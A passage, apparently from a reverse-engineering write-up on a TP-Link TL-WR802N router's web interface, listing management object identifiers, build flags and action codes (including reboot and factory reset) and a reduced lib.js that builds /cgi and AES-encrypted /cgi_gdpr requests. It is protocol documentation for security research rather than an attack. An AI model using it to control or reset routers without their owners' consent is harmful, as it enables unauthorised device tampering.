var ACT_OP_NTP_REQUEST 			= "ACT_NTP_REQUEST";
var ACT_OP_DLNA_MANUAL_SCAN 	= "ACT_DLNA_MANUAL_SCAN";
var ACT_OP_L2TP_CONN 			= "ACT_L2TP_CONN";
var ACT_OP_L2TP_DISCONN 		= "ACT_L2TP_DISCONN";
var ACT_OP_PPTP_CONN 			= "ACT_PPTP_CONN";
var ACT_OP_PPTP_DISCONN 		= "ACT_PPTP_DISCONN";
var ACT_OP_WAN_TYPE_DETECT 		= "ACT_WAN_TYPE_DETECT";
var ACT_OP_BPA_CONN 			= "ACT_BPA_CONN";
var ACT_OP_BPA_DISCONN 			= "ACT_BPA_DISCONN";
var ACT_OP_IPPING 				= "ACT_OP_IPPING";
var ACT_OP_TRACERT 				= "ACT_OP_TRACERT";

// Object Identifier
var IGD = "IGD"
var IGD_DEV_INFO = "IGD_DEV_INFO"									//----
var SYSLOG_CFG = "SYSLOG_CFG"
var MANAGEMENT_SERVER = "MANAGEMENT_SERVER"
var ETH_SWITCH = "ETH_SWITCH"
var SYS_CFG = "SYS_CFG"
var NET_CFG = "NET_CFG"
var USER_CFG = "USER_CFG"											//----
var CURRENT_USER = "CURRENT_USER"
var APP_CFG = "APP_CFG"
var HTTP_CFG = "HTTP_CFG"
var PH_DDNS_CFG = "PH_DDNS_CFG"
var PH_RT_DATA = "PH_RT_DATA"
var DYN_DNS_CFG = "DYN_DNS_CFG"
var UPNP_CFG = "UPNP_CFG"
var UPNP_PORTMAPPING = "UPNP_PORTMAPPING"
var DIAG_TOOL = "DIAG_TOOL"
var CWMP_CFG = "CWMP_CFG"
var SNMP_CFG = "SNMP_CFG"
var NOIP_DNS_CFG = "NOIP_DNS_CFG"
var CMX_DNS_CFG = "CMX_DNS_CFG"
var ACL_CFG = "ACL_CFG"
var WAN_TYPE_DETECT = "WAN_TYPE_DETECT"
var DMZ_HOST_CFG = "DMZ_HOST_CFG"
var TIME = "TIME"
var HOUR = "HOUR"
var L3_FORWARDING = "L3_FORWARDING"
var L3_FORWARDING_ENTRY = "L3_FORWARDING_ENTRY"
var L3_IP6_FORWARDING = "L3_IP6_FORWARDING"
var L3_IP6_FORWARDING_ENTRY = "L3_IP6_FORWARDING_ENTRY"
var L2_BRIDGING = "L2_BRIDGING"
var L2_BRIDGING_ENTRY = "L2_BRIDGING_ENTRY"
var L2_BRIDGING_FILTER = "L2_BRIDGING_FILTER"
var L2_BRIDGING_INTF = "L2_BRIDGING_INTF"
var LAN_DEV = "LAN_DEV"
var LAN_HOST_CFG = "LAN_HOST_CFG"
var LAN_IP_INTF = "LAN_IP_INTF"
var LAN_DHCP_STATIC_ADDR = "LAN_DHCP_STATIC_ADDR"
var LAN_DHCP_COND_SRV_POOL = "LAN_DHCP_COND_SRV_POOL"
var LAN_DHCP_COND_SRV_POOL_OPT = "LAN_DHCP_COND_SRV_POOL_OPT"
var YANDEX_DNS_POOL = "YANDEX_DNS_POOL"
var LAN_IP6_HOST_CFG = "LAN_IP6_HOST_CFG"
var LAN_IP6_INTF = "LAN_IP6_INTF"
var LAN_ETH_INTF = "LAN_ETH_INTF"
var LAN_HOSTS = "LAN_HOSTS"
var LAN_HOST_ENTRY = "LAN_HOST_ENTRY"
var LAN_WLAN = "LAN_WLAN"
var LAN_WLAN_WPS = "LAN_WLAN_WPS"
var LAN_WLAN_MACTABLEENTRY = "LAN_WLAN_MACTABLEENTRY"
var LAN_WLAN_ASSOC_DEV = "LAN_WLAN_ASSOC_DEV"
var LAN_WLAN_BSSDESC_ENTRY = "LAN_WLAN_BSSDESC_ENTRY"
var LAN_WLAN_WEPKEY = "LAN_WLAN_WEPKEY"
var LAN_WLAN_WDSBRIDGE = "LAN_WLAN_WDSBRIDGE"
var LAN_WLAN_MULTISSID = "LAN_WLAN_MULTISSID"
var LAN_WLAN_MSSIDENTRY = "LAN_WLAN_MSSIDENTRY"
var LAN_WLAN_MSSIDWEPKEY = "LAN_WLAN_MSSIDWEPKEY"
var MSSID_MACTABLEENTRY = "MSSID_MACTABLEENTRY"
var LAN_WLAN_WLBRNAME = "LAN_WLAN_WLBRNAME"
var LAN_WLAN_TASK_SCHEDULE = "LAN_WLAN_TASK_SCHEDULE"
var LAN_WLAN_QUICKSAVE = "LAN_WLAN_QUICKSAVE"
var LAN_WLAN_GUESTNET = "LAN_WLAN_GUESTNET"
var LAN_IGMP_SNOOP = "LAN_IGMP_SNOOP"
var WAN_DEV = "WAN_DEV"
var WAN_COMMON_INTF_CFG = "WAN_COMMON_INTF_CFG"
var WAN_DSL_INTF_CFG = "WAN_DSL_INTF_CFG"
var WAN_DSL_INTF_STATS = "WAN_DSL_INTF_STATS"
var WAN_DSL_INTF_STATS_TOTAL = "WAN_DSL_INTF_STATS_TOTAL"
var WAN_DSL_AUTOPVC = "WAN_DSL_AUTOPVC"
var WAN_DSL_AUTO_PVC_PAIR = "WAN_DSL_AUTO_PVC_PAIR"
var WAN_ETH_INTF = "WAN_ETH_INTF"
var WAN_ETH_INTF_STATS = "WAN_ETH_INTF_STATS"
var WAN_PON = "WAN_PON"
var WAN_EPON_INTF = "WAN_EPON_INTF"
var WAN_EPON_INTF_OAM_STATS = "WAN_EPON_INTF_OAM_STATS"
var WAN_EPON_INTF_MPCP_STATS = "WAN_EPON_INTF_MPCP_STATS"
var WAN_EPON_INTF_STATS = "WAN_EPON_INTF_STATS"
var WAN_EPON_INTF_OPTICAL_STATS = "WAN_EPON_INTF_OPTICAL_STATS"
var WAN_GPON_INTF = "WAN_GPON_INTF"
var WAN_GPON_INTF_OMCI_STATS = "WAN_GPON_INTF_OMCI_STATS"
var WAN_GPON_INTF_STATS = "WAN_GPON_INTF_STATS"
var WAN_GPON_INTF_OPTICAL_STATS = "WAN_GPON_INTF_OPTICAL_STATS"
var WAN_CONN_DEVICE = "WAN_CONN_DEVICE"
var WAN_DSL_LINK_CFG = "WAN_DSL_LINK_CFG"
var WAN_PON_LINK_CFG = "WAN_PON_LINK_CFG"
var WAN_ETH_LINK_CFG = "WAN_ETH_LINK_CFG"
var WAN_USB_3G_LINK_CFG = "WAN_USB_3G_LINK_CFG"
var USB_MODEM_PARAM = "USB_MODEM_PARAM"
var WAN_L2TP_CONN = "WAN_L2TP_CONN"
var WAN_L2TP_CONN_PORTMAPPING = "WAN_L2TP_CONN_PORTMAPPING"
var L2TP_CONN_PORTTRIGGERING = "L2TP_CONN_PORTTRIGGERING"
var WAN_L2TP_CONN_STATS = "WAN_L2TP_CONN_STATS"
var WAN_PPTP_CONN = "WAN_PPTP_CONN"
var WAN_PPTP_CONN_PORTMAPPING = "WAN_PPTP_CONN_PORTMAPPING"
var PPTP_CONN_PORTTRIGGERING = "PPTP_CONN_PORTTRIGGERING"
var WAN_PPTP_CONN_STATS = "WAN_PPTP_CONN_STATS"
var WAN_IP_CONN = "WAN_IP_CONN"
var WAN_IP_CONN_PORTMAPPING = "WAN_IP_CONN_PORTMAPPING"
var IP_CONN_PORTTRIGGERING = "IP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN = "WAN_PPP_CONN"
var WAN_PPP_CONN_PORTMAPPING = "WAN_PPP_CONN_PORTMAPPING"
var PPP_CONN_PORTTRIGGERING = "PPP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN_STATS = "WAN_PPP_CONN_STATS"
var STAT_CFG = "STAT_CFG"
var STAT_ENTRY = "STAT_ENTRY"
var DDOS_CFG = "DDOS_CFG"
var DOS_HOST = "DOS_HOST"
var ARP = "ARP"
var ARP_ENTRY = "ARP_ENTRY"
var ARP_BIND = "ARP_BIND"
var ARP_BIND_ENTRY = "ARP_BIND_ENTRY"
var QUEUE_MANAGEMENT = "QUEUE_MANAGEMENT"
var CLASSIFICATION = "CLASSIFICATION"
var QOS_APP = "QOS_APP"
var QOS_INTF = "QOS_INTF"
var QOS_QUEUE = "QOS_QUEUE"
var TC = "TC"
var TC_RULE = "TC_RULE"
var ALG_CFG = "ALG_CFG"
var IPTV = "IPTV"
var DSL_IPTV_CFG = "DSL_IPTV_CFG"
var ETH_IPTV_CFG = "ETH_IPTV_CFG"
var FIREWALL = "FIREWALL"
var INTERNAL_HOST = "INTERNAL_HOST"
var EXTERNAL_HOST = "EXTERNAL_HOST"
var TASK_SCHEDULE = "TASK_SCHEDULE"
var RULE = "RULE"
var URL_LIST = "URL_LIST"
var URL_CFG = "URL_CFG"
var IP6_FIREWALL = "IP6_FIREWALL"
var IP6_INTERNAL_HOST = "IP6_INTERNAL_HOST"
var IP6_EXTERNAL_HOST = "IP6_EXTERNAL_HOST"
var IP6_TASK_SCHEDULE = "IP6_TASK_SCHEDULE"
var IP6_RULE = "IP6_RULE"
var IP6_TUNNEL = "IP6_TUNNEL"
var DSLITE = "DSLITE"
var SIT_6RD = "SIT_6RD"
var SERVICES = "SERVICES"
var VOICE = "VOICE"
var XTP_VOICE_PROCESS_STS = "XTP_VOICE_PROCESS_STS"
var XTP_VOICE_PROCESS = "XTP_VOICE_PROCESS"
var VOICE_CAP = "VOICE_CAP"
var VOICE_CAP_SIP = "VOICE_CAP_SIP"
var VOICE_CAP_MGCP = "VOICE_CAP_MGCP"
var VOICE_CAP_CODECS = "VOICE_CAP_CODECS"
var VOICE_PROF = "VOICE_PROF"
var VOICE_PROF_PROVIDER = "VOICE_PROF_PROVIDER"
var VOICE_PROF_SIP = "VOICE_PROF_SIP"
var VOICE_PROF_SIP_EVTSUBSCRIBE = "VOICE_PROF_SIP_EVTSUBSCRIBE"
var VOICE_PROF_MGCP = "VOICE_PROF_MGCP"
var VOICE_PROF_RTP = "VOICE_PROF_RTP"
var VOICE_PROF_FAXT38 = "VOICE_PROF_FAXT38"
var XTP_USB_VOICEMAIL_PUBLICCFG = "XTP_USB_VOICEMAIL_PUBLICCFG"
var XTP_MULTI_ISP = "XTP_MULTI_ISP"
var XTP_MULTIISP_CODEC = "XTP_MULTIISP_CODEC"
var XTP_MULTIISP_CODEC_LIST = "XTP_MULTIISP_CODEC_LIST"
var VOICE_PROF_LINE = "VOICE_PROF_LINE"
var VOICE_PROF_LINE_SIP = "VOICE_PROF_LINE_SIP"
var VOICE_PROF_LINE_XTPUSBVM = "VOICE_PROF_LINE_XTPUSBVM"
var VOICE_PROF_LINE_CALLFEAT = "VOICE_PROF_LINE_CALLFEAT"
var VOICE_PROF_LINE_PROC = "VOICE_PROF_LINE_PROC"
var VOICE_PROF_LINE_CODEC = "VOICE_PROF_LINE_CODEC"
var VOICE_PROF_LINE_CODEC_LIST = "VOICE_PROF_LINE_CODEC_LIST"
var VOICE_PROF_LINE_STATS = "VOICE_PROF_LINE_STATS"
var XTP_FEATURE_CODE = "XTP_FEATURE_CODE"
var VOICE_PHY_INTERFACE = "VOICE_PHY_INTERFACE"
var VOICE_PHYINTERFACE_TESTS = "VOICE_PHYINTERFACE_TESTS"
var XTP_VOICE_MULTI_ISPDIALPLAN = "XTP_VOICE_MULTI_ISPDIALPLAN"
var XTP_VOICE_PSTN = "XTP_VOICE_PSTN"
var STORAGE_SERVICE = "STORAGE_SERVICE"
var CAPABLE = "CAPABLE"
var USER_ACCOUNT = "USER_ACCOUNT"
var USB_DEVICE = "USB_DEVICE"
var LOGICAL_VOLUME = "LOGICAL_VOLUME"
var FOLDER_BROWSE = "FOLDER_BROWSE"
var FOLDER_NODE = "FOLDER_NODE"
var DLNA_MEDIA_SERVER = "DLNA_MEDIA_SERVER"
var DLNA_MEDIA_SERVER_FOLDER = "DLNA_MEDIA_SERVER_FOLDER"
var SMB_SERVICE = "SMB_SERVICE"
var SMB_SERVICE_FOLDER = "SMB_SERVICE_FOLDER"
var SMB_USER_ACCESS = "SMB_USER_ACCESS"
var FTP_SERVER = "FTP_SERVER"
var FTP_SERVER_FOLDER = "FTP_SERVER_FOLDER"
var FTP_USER_ACCESS = "FTP_USER_ACCESS"
var XTP_PRINT_SERVICE = "XTP_PRINT_SERVICE"
var XTP_IGD_CALL_FIREWALL_CFG = "XTP_IGD_CALL_FIREWALL_CFG"
var XTP_IGD_SPEED_DIAL_CFG = "XTP_IGD_SPEED_DIAL_CFG"
var XTP_IGD_MULTI_ISP_DIAL_PLAN = "XTP_IGD_MULTI_ISP_DIAL_PLAN"
var XTP_IGD_MULTIISPDP_LIST = "XTP_IGD_MULTIISPDP_LIST"
var XTP_CALLLOGCFG = "XTP_CALLLOGCFG"
var IPSEC = "IPSEC"
var IPSEC_CFG = "IPSEC_CFG"
var SYS_MODE = "SYS_MODE"
var EWAN = "EWAN"
var USER_INFO = "USER_INFO"
var GPON_USER_INFO = "GPON_USER_INFO"
var GPON_AUTH_CTC = "GPON_AUTH_CTC"
var GPON_AUTH_SN = "GPON_AUTH_SN"
var GPON_AUTH_PWD = "GPON_AUTH_PWD"
var GPON_MAC_INFO = "GPON_MAC_INFO"
var GPON_FWD_RULE = "GPON_FWD_RULE"
var GPON_LOCAL_RULE_ENTRY = "GPON_LOCAL_RULE_ENTRY"
var GPON_REMOTE_RULE_ENTRY = "GPON_REMOTE_RULE_ENTRY"
var GPON_OMCI_IOT = "GPON_OMCI_IOT"
var GPON_OMCI_IOT_ENTRY = "GPON_OMCI_IOT_ENTRY"
var GPON_OMCI_ME_ATTR = "GPON_OMCI_ME_ATTR"
var CLOUD_SERVICE = "CLOUD_SERVICE"
var FW_UPGRADE_INFO = "FW_UPGRADE_INFO"
var CLOUD_USER_ACCOUNT = "CLOUD_USER_ACCOUNT"
var OWNER_INFO = "OWNER_INFO"
var CURRENT_USER_INFO = "CURRENT_USER_INFO"
var CLOUD_DDNS = "CLOUD_DDNS"
var CLOUD_DDNS_ENTRY = "CLOUD_DDNS_ENTRY"
var WAN_BLOCK = "WAN_BLOCK"
var WAN_ERROR_BLOCK = "WAN_ERROR_BLOCK"
var FW_UP_INFO_BLOCK = "FW_UP_INFO_BLOCK"
var IPPING_DIAG = "IPPING_DIAG"
var TRACEROUTE_DIAG = "TRACEROUTE_DIAG"
var SDMZ_CFG = "SDMZ_CFG"
var WEB_CFG = "WEB_CFG"
var VLAN = "VLAN"
var ISP_SERVICE = "ISP_SERVICE"
var WOL = "WOL"
var WOL_ITEM = "WOL_ITEM"
var IPV6_CFG = "IPV6_CFG"
var SYS_STATE = "SYS_STATE"
var IPV6_PASS_THROUGH = "IPV6_PASS_THROUGH"
var AUTO_REBOOT_CFG = "AUTO_REBOOT_CFG"
var CPU_MEM = "CPU_MEM"
var PRODUCE_INFO = "PRODUCE_INFO"
var MULTIMODE = "MULTIMODE"
var MULTIMODE_AP = "MULTIMODE_AP"
var AP_CONFIG_WEPKEY = "AP_CONFIG_WEPKEY"
var AP_SNMP_CFG = "AP_SNMP_CFG"
var MULTIMODE_CLIENT = "MULTIMODE_CLIENT"
var MULTIMODE_RE = "MULTIMODE_RE"
var RE_CONFIG_WEPKEY = "RE_CONFIG_WEPKEY"
var MULTIMODE_ROUTER = "MULTIMODE_ROUTER"
var ROUTER_CONFIG_WEPKEY = "ROUTER_CONFIG_WEPKEY"
var ROUTER_CONFIG_MULTISSID = "ROUTER_CONFIG_MULTISSID"
var ROUTER_CONFIG_MSSIDENTRY = "ROUTER_CONFIG_MSSIDENTRY"
var MULTIMODE_MSSID = "MULTIMODE_MSSID"
var MSSID_CONFIG_MULTISSID = "MSSID_CONFIG_MULTISSID"
var MSSID_CONFIG_MSSIDENTRY = "MSSID_CONFIG_MSSIDENTRY"
var MULTIMODE_HOTSPOT = "MULTIMODE_HOTSPOT"
var PING_WATCH_DOG = "PING_WATCH_DOG"
var LED_CONTROL = "LED_CONTROL"

// Dynamic Parameters 
var INCLUDE_MULTI_LANGUAGE_Q=0
var INCLUDE_MULTIMODE_RE=1
var WEB_INCLUDE_TEST=0
var WEB_INCLUDE_MULTI_EWAN=0
var WEB_INCLUDE_DST=1
var WEB_QS_CHANGEPASSWORD=0
var INCLUDE_IP6_WAN_NOT_ASSIGN_ADDR=0
var INCLUDE_UN_IPTV=0
var INCLUDE_SCHEDULE_NEW=0
var INCLUDE_HW_NAT=0
var INCLUDE_LED_CONTROL=0
var INCLUDE_MULTILANGUAGE=0
var INCLUDE_FEEDBACK=0
var INCLUDE_FORCE_TIMEZONE_SELECT=0
var INCLUDE_FORCE_REGION_SELECT=0
var INCLUDE_WLAN_REGION_LIST=0
var INCLUDE_MULTIPLE_LOCALIZATION=0
var INCLUDE_SCAN_ALL_CHANNELS=0
var INCLUDE_LAN_WLAN=1
var INCLUDE_VOIP
var INCLUDE_FXS_NUM
var INCLUDE_CALLLOG
var INCLUDE_USB_VOICEMAIL
var INCLUDE_PSTN
var INCLUDE_PSTN_GATEWAY
var INCLUDE_PSTN_LIFELINE
var INCLUDE_BRIDGING=1
var INCLUDE_IGMP=1
var INCLUDE_ETHERNET_WAN=1
var INCLUDE_SNMP
var INCLUDE_RIP=1
var INCLUDE_DDNS_PH
var INCLUDE_LAN_WLAN_MSSID=1
var INCLUDE_LAN_WLAN_WDS=1
var INCLUDE_IPTV
var INCLUDE_CWMP
var INCLUDE_DYNDNS=1
var INCLUDE_USB=1
var INCLUDE_USB_STORAGE=1
var INCLUDE_USB_MEDIA_SERVER=1
var INCLUDE_USB_SAMBA_SERVER=1
var INCLUDE_USB_FTP_SERVER=1
var INCLUDE_USB_OVER_IP
var INCLUDE_ADSLWAN
var INCLUDE_AUTO_PVC
var INCLUDE_IPV6=1
var INCLUDE_IPV6_SLAAC=1
var INCLUDE_SPECIAL_DIAL_MODE
var INCLUDE_WAN_MODE=1
var INCLUDE_IPSEC
var INCLUDE_NOIPDNS=1
var INCLUDE_ALG_H323=1
var INCLUDE_ALG_SIP=1
var INCLUDE_PON_ETH_WAN
var INCLUDE_EPON_INFO
var INCLUDE_GPON_INFO
var INCLUDE_QOS
var INCLUDE_E8_APP
var INCLUDE_TFC_PERU
var INCLUDE_USB_3G_DONGLE=1
var INCLUDE_LAN_WLAN_SCHEDULE=1
var INCLUDE_ROUTE_BINDING
var INCLUDE_LAN_WLAN_GUESTNETWORK=1
var INCLUDE_LAN_WLAN_DUALBAND=1
var INCLUDE_LAN_WLAN_HWSWITCH
var INCLUDE_LAN_WLAN_AC=1
var INCLUDE_LAN_WLAN_WDS_DETECT
var INCLUDE_L2TP=1
var INCLUDE_PPTP=1
var INCLUDE_IPV6_MLD=1
var INCLUDE_ACL
var INCLUDE_ACL_ADVANCE
var INCLUDE_DUAL_ACCESS=1
var INCLUDE_WAN_TYPE_DETECT=1
var INCLUDE_BPA=1
var INCLUDE_CMXDNS=1
var INCLUDE_IPPING_DIAG=1
var INCLUDE_TRACEROUTE_DIAG=1
var INCLUDE_LAN_WLAN_QUICKSAVE=1
var INCLUDE_IGMP_FORCEVERSION=1
var INCLUDE_PORTABLE_APP=1
var DEFAULT_NO_SPEC=1
var INCLUDE_MEXICO_SPEC
var INCLUDE_CANADA_SPEC
var INCLUDE_JAPAN_SPEC
var INCLUDE_KOREA_SPEC
var INCLUDE_PL_SPEC
var INCLUDE_BR_SPEC
var INCLUDE_ROMANIA_SPEC
var INCLUDE_RUSSIA_SPEC
var INCLUDE_US_SPEC
var INCLUDE_VN_SPEC
var INCLUDE_VIETNAM_FPT
var INCLUDE_TW_SPEC
var INCLUDE_ES_SPEC
var INCLUDE_X_TP_VLAN=1
var INCLUDE_FORBID_WAN_PING=1
var INCLUDE_SMART_DHCP=1
var INCLUDE_MIC=1
var INCLUDE_IPV6_PASS_THROUGH
var INCLUDE_AUTOREBOOT
var INCLUDE_CPUMEM_INFO
var INCLUDE_MULTIMODE_RE=1
var INCLUDE_MULTIMODE_AP=1
var INCLUDE_MULTIMODE_CLIENT=1
var INCLUDE_MULTIMODE=1
var INCLUDE_PING_WATCHDOG=1
var INCLUDE_MULTIMODE_ROUTER=1
var INCLUDE_MULTIMODE_MSSID
var INCLUDE_YANDEX_DNS
var INCLUDE_LED_CONTROL
var INCLUDE_MULTILANGUAGE
var INCLUDE_FORCE_TIMEZONE_SELECT
var INCLUDE_FORCE_REGION_SELECT
var INCLUDE_MULTIMODE_HOTSPOT=1
var INCLUDE_WLAN_REGION_LIST
var INCLUDE_FBWIFI
The concept introduced above varies slightly on the newer firmware, which uses /cgi_gdpr in addition to /cgi. In this scenario the payload is AES encrypted before transmission. The generic /cgi calls are still used, but most calls need to be encrypted. This is done by setting the new securityLevel parameter of $.exe(hook, unerr, securityLevel) to 1, which enables encryption.
TL-WR802N FW190428
ⓘ Strongly reduced version of lib.js, showing the $.cgi, $.act and $.exe methods.
# lib_modified.js
(function(){
var window = this;

	window.$ = {

		cgi: function(path, arg, hook, noquit, unerr) {
			var expr = /(^|\/)(\w+)\.htm$/;
			if ($.local || $.sim) path = $.params;
			else path = (path ? path : $.curPage.replace(/\.htm$/, ".cgi")) + (arg ? "?" + $.toStr(arg, "=", "&") : "");
			$.ret = 0;
			var func = hook ? function(ret) {if (!ret && (ret = $.ret)) $.err("cgi", $.ret, unerr); if (typeof hook === "function") hook(ret);} : null;
			var ret =  $.io(path, true, func, null, noquit, unerr);
			
			if (!ret && (ret = $.ret))
				$.err("cgi", $.ret, unerr);
			return ret;
		},

		act: function(type, oid, stack, pStack, attrs) {
			if (!type || !oid)
				return false;
			stack = stack ? stack : "0,0,0,0,0,0";
			pStack = pStack ? pStack : "0,0,0,0,0,0";
			attrs = $.toStr(attrs, "=", "\r\n", true);
			attrs = attrs.replace(/__stack=[0-9,]*\r\n/, "");
			var ret = null;
			switch (type) {
				case ACT_ADD:		
					if ($.cn) attrs = $.ansi(attrs);
				case ACT_GET:		
					ret = {};
					break;
				case ACT_GL:		
				case ACT_GS:		
					ret = [];
					break;
				case ACT_SET:		
				case ACT_CGI:
					oid = oid ? oid : $.curPage.replace(/\.htm$/, ".cgi");
					if ($.cn) attrs = $.ansi(attrs);
				case ACT_DEL:		
				case ACT_OP:
					break;
				default: 
					return false;
			}
			$.as.push([type, null, oid, stack, pStack, attrs, attrs ? attrs.match(/\r\n/g).length : 0]);
			$.ds.push(ret);
			return ret;
		},
		
		exe: function(hook, unerr, securityLevel) {
			var url = "/cgi?";
			var data = "";
			var index = 0;
			var obj;
			var bAnsi = false;
			var ret;        // result of the synchronous $.io() call in the no-hook branch
			var count = 0;  // retry counter for ERR_HTTP_ERR_CGI_INVALID_ANSI in that branch
			
			var tmpdata = "";
			
			if( INCLUDE_LOGIN_GDPR_ENCRYPT && securityLevel != 0)
			{
				
				try{
					url="/cgi_gdpr?";
				}
				catch(e)
				{
				}
			}
			
			
			if ($.as.length == 0 || $.local || $.sim) {
				if (hook && typeof hook === "function") $.timeout(hook, 200);
				while($.as.pop() !== undefined);
				while($.ds.pop() !== undefined);
				return 0;
			}
			
			$.empty($.id("ansiform"));
			while ($.ansiarg.length) {
				obj = $.ansiarg.shift();
				$.append($.id("ansiform"), "<input type='hidden' name='"+obj[0]+"' value='"+obj[1].replace(/\&/g, "&amp;").replace(/</g, "&lt;").replace(/'/g, "&apos;")+"' />");
				bAnsi = true;
			}
			
			if(INCLUDE_LOGIN_GDPR_ENCRYPT && url.match("/cgi_gdpr") != null)
			{
				while(obj = $.as.shift()){
					//url = "/cgi";
					tmpdata += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
					//url += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
					data += "[" + obj[2] + "#" + obj[3] + "#" + obj[4] + "]" + index + ", " + obj[6] + "\r\n" + obj[5];				
					index++;
				}	
				tmpdata = tmpdata.substr(0, tmpdata.length - 1);
				tmpdata = tmpdata + "\r\n"+data;
				data = tmpdata;
			}
			else
			{
				while(obj = $.as.shift()){
					url += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
					data += "[" + obj[2] + "#" + obj[3] + "#" + obj[4] + "]" + index + ", " + obj[6] + "\r\n" + obj[5];				
					index++;
				}	
			}		
			url = url.substr(0, url.length - 1);
			
			if (hook) {
				var tmpds = $.mkArr($.ds);
				while($.ds.length) $.ds.pop();	
			}
			
			var resolve = function(ret, ds) {
				if (typeof ret !== "number") {
					var lines = ret.split('\n');
					ret = 0;
					$.ret = 0;
					var scripts = "";
					
					for (var i = 0, l = lines.length; i < l; i++) {
						if (lines[i] == "") continue;
						if (lines[i].charAt(0) == "[") {
							if (scripts != "") {
								$.script(scripts);
								if ($.ret) {
									ret = $.ret;
									$.err("cgi", ret, unerr);
									break;
								}
								scripts = "";
							}
							var n = lines[i].indexOf("]");
							var j = parseInt(lines[i].substr(n+1), 10);
							var stack = lines[i].substr(1, n-1);
							var instance;
							if (stack == "error") {
								if (j) {
									ret = j;
									if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) $.err("exe", ret, unerr);
									break;
								}
							}
							else if (ds[j] instanceof Array) {
								instance = {__stack: stack};
								ds[j].push(instance);
							}
							else if (ds[j] != null) {
								instance  = ds[j];
								instance.__stack = stack;
							}
						}
						else {
							if (stack == "cgi") {
								scripts += lines[i] + '\n';
							}
							else {
								var attr = lines[i].split("=");
								instance[attr[0]] = attr.slice(1).join('=');
							}
						}
					}
				}
				while(ds.length) ds.pop();
				return ret;
			}
			
			if (bAnsi) {
				var formObj = $.d.forms[0];	
				try {
					formObj.target = "up_frame";
					formObj.action = "/cgi/ansi";
					formObj.submit();
				}catch(e){}
			}
			
			if (hook) {
				var resolve2 = function(){
				$.io(url, false, function(ret){ ret = resolve(ret, tmpds); if (typeof hook === "function") hook(ret);}, data, false, unerr)};
				if (bAnsi) $.timeout(resolve2, 100);
				else resolve2();
				return 0;
			}
			else {
				while(ret = $.io(url, false, null, data, false, unerr)) {
					ret = resolve(ret, $.ds);
					if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) return ret;
					count++;
					if (count > 3) return $.err("exe", ERR_HTTP_ERR_CGI_INVALID_ANSI, unerr);
				}
			}
		}
	};
})();
ⓘ CGI parameters extracted from lib.js and oid_str.js
var ACT_GET = 1;
var ACT_SET = 2;
var ACT_ADD = 3;
var ACT_DEL = 4;
var ACT_GL  = 5;
var ACT_GS  = 6;
var ACT_OP  = 7;
var ACT_CGI = 8;
var ACT_SIG = 9;

var ACT_OP_REBOOT = "ACT_REBOOT";
var ACT_OP_FACTORY_RESET = "ACT_FACTORY_RESET";
var ACT_OP_DHCP_RENEW = "ACT_DHCP_RENEW";
var ACT_OP_DHCP_RELEASE = "ACT_DHCP_RELEASE";
var ACT_OP_PPP_CONN = "ACT_PPP_CONN";
var ACT_OP_PPP_DISCONN = "ACT_PPP_DISCONN";
var ACT_OP_WLAN_GET_NEW_PIN = "ACT_WLAN_GET_NEW_PIN";
var ACT_OP_WLAN_RESTORE_PIN = "ACT_WLAN_RESTORE_PIN";
var ACT_OP_WLAN_UPDATE_ASSOC = "ACT_WLAN_UPDATE_ASSOC";
var ACT_OP_WLAN_WPS_PBC = "ACT_WLAN_WPS_PBC";
var ACT_OP_WLAN_WPS_PIN = "ACT_WLAN_WPS_PIN";
var ACT_OP_WLAN_SCAN = "ACT_WLAN_SCAN";
var ACT_OP_NTP_REQUEST = "ACT_NTP_REQUEST";
var ACT_OP_DLNA_MANUAL_SCAN = "ACT_DLNA_MANUAL_SCAN";
var ACT_OP_L2TP_CONN = "ACT_L2TP_CONN";
var ACT_OP_L2TP_DISCONN = "ACT_L2TP_DISCONN";
var ACT_OP_PPTP_CONN = "ACT_PPTP_CONN";
var ACT_OP_PPTP_DISCONN = "ACT_PPTP_DISCONN";
var ACT_OP_WAN_TYPE_DETECT = "ACT_WAN_TYPE_DETECT";
var ACT_OP_BPA_CONN = "ACT_BPA_CONN";
var ACT_OP_BPA_DISCONN = "ACT_BPA_DISCONN";
var ACT_OP_IPPING = "ACT_OP_IPPING";
var ACT_OP_TRACERT = "ACT_OP_TRACERT";
var ERR_HTTP_ERR_CGI_INVALID_ANSI = 71017;

var IGD = "IGD"
var IGD_DEV_INFO = "IGD_DEV_INFO"
var SYSLOG_CFG = "SYSLOG_CFG"
var MANAGEMENT_SERVER = "MANAGEMENT_SERVER"
var ETH_SWITCH = "ETH_SWITCH"
var SYS_CFG = "SYS_CFG"
var NET_CFG = "NET_CFG"
var USER_CFG = "USER_CFG"
var CURRENT_USER = "CURRENT_USER"
var APP_CFG = "APP_CFG"
var HTTP_CFG = "HTTP_CFG"
var HTTPS_CERT_AUTH = "HTTPS_CERT_AUTH"
var PH_DDNS_CFG = "PH_DDNS_CFG"
var PH_RT_DATA = "PH_RT_DATA"
var DYN_DNS_CFG = "DYN_DNS_CFG"
var UPNP_CFG = "UPNP_CFG"
var UPNP_PORTMAPPING = "UPNP_PORTMAPPING"
var DIAG_TOOL = "DIAG_TOOL"
var CWMP_CFG = "CWMP_CFG"
var SNMP_CFG = "SNMP_CFG"
var NOIP_DNS_CFG = "NOIP_DNS_CFG"
var CMX_DNS_CFG = "CMX_DNS_CFG"
var ACL_CFG = "ACL_CFG"
var WAN_TYPE_DETECT = "WAN_TYPE_DETECT"
var DMZ_HOST_CFG = "DMZ_HOST_CFG"
var TIME = "TIME"
var HOUR = "HOUR"
var L3_FORWARDING = "L3_FORWARDING"
var L3_FORWARDING_ENTRY = "L3_FORWARDING_ENTRY"
var L3_IP6_FORWARDING = "L3_IP6_FORWARDING"
var L3_IP6_FORWARDING_ENTRY = "L3_IP6_FORWARDING_ENTRY"
var L2_BRIDGING = "L2_BRIDGING"
var L2_BRIDGING_ENTRY = "L2_BRIDGING_ENTRY"
var L2_BRIDGING_FILTER = "L2_BRIDGING_FILTER"
var L2_BRIDGING_INTF = "L2_BRIDGING_INTF"
var LAN_DEV = "LAN_DEV"
var LAN_HOST_CFG = "LAN_HOST_CFG"
var LAN_IP_INTF = "LAN_IP_INTF"
var LAN_DHCP_STATIC_ADDR = "LAN_DHCP_STATIC_ADDR"
